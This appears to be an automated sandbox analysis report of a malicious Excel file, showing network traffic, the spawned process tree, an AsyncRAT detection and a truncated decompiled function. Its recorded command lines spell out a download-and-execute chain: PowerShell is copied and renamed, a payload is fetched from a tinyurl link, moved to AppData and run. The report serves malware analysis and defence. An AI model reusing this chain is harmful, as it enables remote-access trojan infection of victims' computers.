                                                                                                                                                                                                                            Nov 19, 2020 09:31:36.116816998 CET5302353192.168.2.38.8.8.8
                                                                                                                                                                                                                            Nov 19, 2020 09:31:36.129893064 CET53530238.8.8.8192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:31:36.976680040 CET4956353192.168.2.38.8.8.8
                                                                                                                                                                                                                            Nov 19, 2020 09:31:36.992295980 CET53495638.8.8.8192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:31:42.882538080 CET5135253192.168.2.38.8.8.8
                                                                                                                                                                                                                            Nov 19, 2020 09:31:42.894809961 CET53513528.8.8.8192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:31:44.111989021 CET5934953192.168.2.38.8.8.8
                                                                                                                                                                                                                            Nov 19, 2020 09:31:44.158605099 CET53593498.8.8.8192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:31:44.486104012 CET5708453192.168.2.38.8.8.8
                                                                                                                                                                                                                            Nov 19, 2020 09:31:44.511749983 CET53570848.8.8.8192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:31:44.823503971 CET5882353192.168.2.38.8.8.8
                                                                                                                                                                                                                            Nov 19, 2020 09:31:44.836879015 CET53588238.8.8.8192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:31:45.499190092 CET5708453192.168.2.38.8.8.8
                                                                                                                                                                                                                            Nov 19, 2020 09:31:45.512027025 CET53570848.8.8.8192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:31:46.503814936 CET5708453192.168.2.38.8.8.8
                                                                                                                                                                                                                            Nov 19, 2020 09:31:46.524812937 CET53570848.8.8.8192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:31:48.500957966 CET5708453192.168.2.38.8.8.8
                                                                                                                                                                                                                            Nov 19, 2020 09:31:48.514363050 CET53570848.8.8.8192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:31:48.698323965 CET5756853192.168.2.38.8.8.8
                                                                                                                                                                                                                            Nov 19, 2020 09:31:48.710694075 CET53575688.8.8.8192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:31:52.501451969 CET5708453192.168.2.38.8.8.8
                                                                                                                                                                                                                            Nov 19, 2020 09:31:52.514358997 CET53570848.8.8.8192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:31:58.914940119 CET5054053192.168.2.38.8.8.8
                                                                                                                                                                                                                            Nov 19, 2020 09:31:58.927234888 CET53505408.8.8.8192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:00.446456909 CET5436653192.168.2.38.8.8.8
                                                                                                                                                                                                                            Nov 19, 2020 09:32:00.459573030 CET53543668.8.8.8192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:01.536395073 CET5303453192.168.2.38.8.8.8
                                                                                                                                                                                                                            Nov 19, 2020 09:32:01.561336994 CET53530348.8.8.8192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:11.895518064 CET5776253192.168.2.38.8.8.8
                                                                                                                                                                                                                            Nov 19, 2020 09:32:11.908122063 CET53577628.8.8.8192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:20.207458973 CET5543553192.168.2.38.8.8.8
                                                                                                                                                                                                                            Nov 19, 2020 09:32:20.227149963 CET53554358.8.8.8192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:21.277956963 CET5071353192.168.2.38.8.8.8
                                                                                                                                                                                                                            Nov 19, 2020 09:32:21.296295881 CET53507138.8.8.8192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:21.341136932 CET5613253192.168.2.38.8.8.8
                                                                                                                                                                                                                            Nov 19, 2020 09:32:21.354634047 CET53561328.8.8.8192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:21.391946077 CET5898753192.168.2.38.8.8.8
                                                                                                                                                                                                                            Nov 19, 2020 09:32:21.411410093 CET53589878.8.8.8192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:46.098938942 CET5657953192.168.2.38.8.8.8
                                                                                                                                                                                                                            Nov 19, 2020 09:32:46.125849962 CET53565798.8.8.8192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:52.648489952 CET6063353192.168.2.38.8.8.8
                                                                                                                                                                                                                            Nov 19, 2020 09:32:52.661617994 CET53606338.8.8.8192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.444211006 CET6129253192.168.2.38.8.8.8
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.456526041 CET53612928.8.8.8192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:56.976692915 CET6361953192.168.2.38.8.8.8
                                                                                                                                                                                                                            Nov 19, 2020 09:32:56.995260954 CET53636198.8.8.8192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:33:23.189728022 CET6493853192.168.2.38.8.8.8
                                                                                                                                                                                                                            Nov 19, 2020 09:33:23.202099085 CET53649388.8.8.8192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:33:25.075480938 CET6194653192.168.2.38.8.8.8
                                                                                                                                                                                                                            Nov 19, 2020 09:33:25.109967947 CET53619468.8.8.8192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:34:00.039959908 CET6491053192.168.2.38.8.8.8
                                                                                                                                                                                                                            Nov 19, 2020 09:34:00.058621883 CET53649108.8.8.8192.168.2.3

                                                                                                                                                                                                                            DNS Queries

                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                                            Nov 19, 2020 09:32:52.648489952 CET192.168.2.38.8.8.80x1383Standard query (0)tinyurl.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.444211006 CET192.168.2.38.8.8.80x7aceStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)

                                                                                                                                                                                                                            DNS Answers

                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                                            Nov 19, 2020 09:32:52.661617994 CET8.8.8.8192.168.2.30x1383No error (0)tinyurl.com104.20.138.65A (IP address)IN (0x0001)
                                                                                                                                                                                                                            Nov 19, 2020 09:32:52.661617994 CET8.8.8.8192.168.2.30x1383No error (0)tinyurl.com104.20.139.65A (IP address)IN (0x0001)
                                                                                                                                                                                                                            Nov 19, 2020 09:32:52.661617994 CET8.8.8.8192.168.2.30x1383No error (0)tinyurl.com172.67.1.225A (IP address)IN (0x0001)
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.456526041 CET8.8.8.8192.168.2.30x7aceNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.456526041 CET8.8.8.8192.168.2.30x7aceNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.456526041 CET8.8.8.8192.168.2.30x7aceNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.456526041 CET8.8.8.8192.168.2.30x7aceNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.456526041 CET8.8.8.8192.168.2.30x7aceNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)

                                                                                                                                                                                                                            HTTPS Packets

                                                                                                                                                                                                                            TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                                                            Nov 19, 2020 09:32:52.833199024 CET104.20.138.65443192.168.2.349733CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc RSA CA-2, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc RSA CA-2, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Aug 03 02:00:00 CEST 2020 Mon Jan 27 13:46:39 CET 2020Tue Aug 03 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,054328bd36c14bd82ddaa0c04b25ed9ad
                                                                                                                                                                                                                            CN=Cloudflare Inc RSA CA-2, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:46:39 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.492600918 CET162.159.129.233443192.168.2.349734CN=ssl711319.cloudflaressl.com CN=COMODO RSA Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=COMODO RSA Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Oct 27 01:00:00 CET 2020 Thu Sep 25 02:00:00 CEST 2014 Thu Jan 01 01:00:00 CET 2004Thu May 06 01:59:59 CEST 2021 Tue Sep 25 01:59:59 CEST 2029 Mon Jan 01 00:59:59 CET 2029769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,054328bd36c14bd82ddaa0c04b25ed9ad
                                                                                                                                                                                                                            CN=COMODO RSA Domain Validation Secure Server CA 2, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Sep 25 02:00:00 CEST 2014Tue Sep 25 01:59:59 CEST 2029
                                                                                                                                                                                                                            CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Jan 01 01:00:00 CET 2004Mon Jan 01 00:59:59 CET 2029

                                                                                                                                                                                                                            Code Manipulations

                                                                                                                                                                                                                            Statistics

                                                                                                                                                                                                                            CPU Usage

                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            Memory Usage

                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                                            Behavior

                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            System Behavior

                                                                                                                                                                                                                            Analysis Process: EXCEL.EXE PID: 6844 Parent PID: 792

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Start time:09:31:41
                                                                                                                                                                                                                            Start date:19/11/2020
                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                                                            Imagebase:0x60000
                                                                                                                                                                                                                            File size:27110184 bytes
                                                                                                                                                                                                                            MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                                            Chronological Activities

                                                                                                                                                                                                                            Analysis Process: cmd.exe PID: 7120 Parent PID: 6844

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Start time:09:31:46
                                                                                                                                                                                                                            Start date:19/11/2020
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:cmd.exe /c robocopy %windir%\system32\WindowsPowerShell\v1.0\ %temp% powershell.exe /mt /z & exit
                                                                                                                                                                                                                            Imagebase:0xbd0000
                                                                                                                                                                                                                            File size:232960 bytes
                                                                                                                                                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                                            Chronological Activities

                                                                                                                                                                                                                            Analysis Process: cmd.exe PID: 7140 Parent PID: 6844

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Start time:09:31:46
                                                                                                                                                                                                                            Start date:19/11/2020
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:cmd /c timeout /t 1 & cd %temp% & ren powershell.exe o.exe & exit
                                                                                                                                                                                                                            Imagebase:0xbd0000
                                                                                                                                                                                                                            File size:232960 bytes
                                                                                                                                                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                                            Chronological Activities

                                                                                                                                                                                                                            Analysis Process: conhost.exe PID: 7148 Parent PID: 7120

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Start time:09:31:46
                                                                                                                                                                                                                            Start date:19/11/2020
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff6b2800000
                                                                                                                                                                                                                            File size:625664 bytes
                                                                                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                                            Chronological Activities

                                                                                                                                                                                                                            Analysis Process: cmd.exe PID: 7156 Parent PID: 6844

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Start time:09:31:47
                                                                                                                                                                                                                            Start date:19/11/2020
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:cmd /c %temp%\o.exe -w 1 cd $env:temp; Start-Sleep 3; (get-item o.exe).Attributes += 'Hidden'
                                                                                                                                                                                                                            Imagebase:0xbd0000
                                                                                                                                                                                                                            File size:232960 bytes
                                                                                                                                                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                                            Chronological Activities

                                                                                                                                                                                                                            Analysis Process: conhost.exe PID: 7164 Parent PID: 7140

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Start time:09:31:47
                                                                                                                                                                                                                            Start date:19/11/2020
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff6b2800000
                                                                                                                                                                                                                            File size:625664 bytes
                                                                                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                                            Chronological Activities

                                                                                                                                                                                                                            Analysis Process: conhost.exe PID: 4308 Parent PID: 7156

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Start time:09:31:47
                                                                                                                                                                                                                            Start date:19/11/2020
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff6b2800000
                                                                                                                                                                                                                            File size:625664 bytes
                                                                                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                                            Chronological Activities

                                                                                                                                                                                                                            Analysis Process: Robocopy.exe PID: 5776 Parent PID: 7120

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Start time:09:31:47
                                                                                                                                                                                                                            Start date:19/11/2020
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\Robocopy.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:robocopy C:\Windows\system32\WindowsPowerShell\v1.0\ C:\Users\user\AppData\Local\Temp powershell.exe /mt /z
                                                                                                                                                                                                                            Imagebase:0x170000
                                                                                                                                                                                                                            File size:103936 bytes
                                                                                                                                                                                                                            MD5 hash:BB8F54AE10FDA174289A4A495809EB69
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                                                            Chronological Activities

                                                                                                                                                                                                                            Analysis Process: timeout.exe PID: 5568 Parent PID: 7140

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Start time:09:31:47
                                                                                                                                                                                                                            Start date:19/11/2020
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:timeout /t 1
                                                                                                                                                                                                                            Imagebase:0x11a0000
                                                                                                                                                                                                                            File size:26112 bytes
                                                                                                                                                                                                                            MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                                            Chronological Activities

                                                                                                                                                                                                                            Analysis Process: cmd.exe PID: 4880 Parent PID: 6844

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Start time:09:31:50
                                                                                                                                                                                                                            Start date:19/11/2020
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:cmd /c %temp%\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
                                                                                                                                                                                                                            Imagebase:0xbd0000
                                                                                                                                                                                                                            File size:232960 bytes
                                                                                                                                                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                                            Chronological Activities

                                                                                                                                                                                                                            Analysis Process: cmd.exe PID: 1708 Parent PID: 6844

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Start time:09:31:50
                                                                                                                                                                                                                            Start date:19/11/2020
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:cmd /c %temp%\o.exe -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata'
                                                                                                                                                                                                                            Imagebase:0xbd0000
                                                                                                                                                                                                                            File size:232960 bytes
                                                                                                                                                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                                            Chronological Activities

                                                                                                                                                                                                                            Analysis Process: conhost.exe PID: 3564 Parent PID: 4880

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Start time:09:31:50
                                                                                                                                                                                                                            Start date:19/11/2020
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff6b2800000
                                                                                                                                                                                                                            File size:625664 bytes
                                                                                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                                            Chronological Activities

                                                                                                                                                                                                                            Analysis Process: cmd.exe PID: 6260 Parent PID: 6844

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Start time:09:31:50
                                                                                                                                                                                                                            Start date:19/11/2020
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:cmd /c %temp%\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;
                                                                                                                                                                                                                            Imagebase:0xbd0000
                                                                                                                                                                                                                            File size:232960 bytes
                                                                                                                                                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                                            Chronological Activities

                                                                                                                                                                                                                            Analysis Process: conhost.exe PID: 5076 Parent PID: 1708

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Start time:09:31:50
                                                                                                                                                                                                                            Start date:19/11/2020
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff6b2800000
                                                                                                                                                                                                                            File size:625664 bytes
                                                                                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                                                            Chronological Activities

                                                                                                                                                                                                                            Analysis Process: o.exe PID: 6036 Parent PID: 4880

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Start time:09:31:51
                                                                                                                                                                                                                            Start date:19/11/2020
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\o.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
                                                                                                                                                                                                                            Imagebase:0x1250000
                                                                                                                                                                                                                            File size:430592 bytes
                                                                                                                                                                                                                            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:.Net C# or VB.NET

                                                                                                                                                                                                                            Chronological Activities

                                                                                                                                                                                                                            Analysis Process: conhost.exe PID: 6072 Parent PID: 6260

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Start time:09:31:51
                                                                                                                                                                                                                            Start date:19/11/2020
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff6b2800000
                                                                                                                                                                                                                            File size:625664 bytes
                                                                                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                                                            Chronological Activities

                                                                                                                                                                                                                            Analysis Process: o.exe PID: 5728 Parent PID: 1708

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Start time:09:31:51
                                                                                                                                                                                                                            Start date:19/11/2020
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\o.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata'
                                                                                                                                                                                                                            Imagebase:0x1250000
                                                                                                                                                                                                                            File size:430592 bytes
                                                                                                                                                                                                                            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:.Net C# or VB.NET

                                                                                                                                                                                                                            Chronological Activities

                                                                                                                                                                                                                            Analysis Process: o.exe PID: 1560 Parent PID: 6260

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Start time:09:31:51
                                                                                                                                                                                                                            Start date:19/11/2020
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\o.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;
                                                                                                                                                                                                                            Imagebase:0x1250000
                                                                                                                                                                                                                            File size:430592 bytes
                                                                                                                                                                                                                            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:.Net C# or VB.NET

                                                                                                                                                                                                                            Chronological Activities

                                                                                                                                                                                                                            Analysis Process: vc.exe PID: 4896 Parent PID: 1560

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Start time:09:33:05
                                                                                                                                                                                                                            Start date:19/11/2020
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\vc.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\vc.exe
                                                                                                                                                                                                                            Imagebase:0x780000
                                                                                                                                                                                                                            File size:160312 bytes
                                                                                                                                                                                                                            MD5 hash:BB7C0DFD8ECC7EEBCE937A232608695F
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000020.00000002.521796499.0000000002B41000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                                            Chronological Activities

                                                                                                                                                                                                                            Disassembly

                                                                                                                                                                                                                            Code Analysis

                                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                                              Analysis Process: o.exe PID: 6036 Parent PID: 4880 o.exeCOMMON

                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                              Function 01258D90, Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 379registryCOMMONCrypto
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 49%
                                                                                                                                                                                                                              			E01258D90(void** _a4, short** _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				void* _v9;
				wchar_t* _v16;
				long _v20;
				long _v24;
				long _v28;
				int _v32;
				void* _v36;
				int _v40;
				long _v44;
				struct _FILETIME _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t75;
				void* _t77;
				intOrPtr* _t79;
				long _t81;
				intOrPtr* _t85;
				void* _t91;
				long _t95;
				intOrPtr* _t96;
				long _t106;
				void* _t109;
				long _t110;
				intOrPtr* _t111;
				long _t121;
				long _t125;
				signed int _t127;
				signed int _t128;
				void* _t134;
				wchar_t* _t135;
				long _t138;
				long _t142;
				long* _t151;
				void* _t157;
				wchar_t* _t158;
				void* _t162;
				void* _t163;
				signed int _t164;
				intOrPtr* _t165;
				void* _t166;
				intOrPtr* _t167;
				short** _t168;
				short* _t169;
				void* _t171;
				signed short* _t175;
				signed int _t177;
				void* _t178;
				void* _t181;

				_t75 =  *0x1260358; // 0xc21f7063
				_v8 = _t75 ^ _t177;
				_v36 = 0;
				if(_a4 == 0 || _a8 == 0) {
					L54:
					_t77 = 0;
					goto L52;
				} else {
					_t172 = _a12;
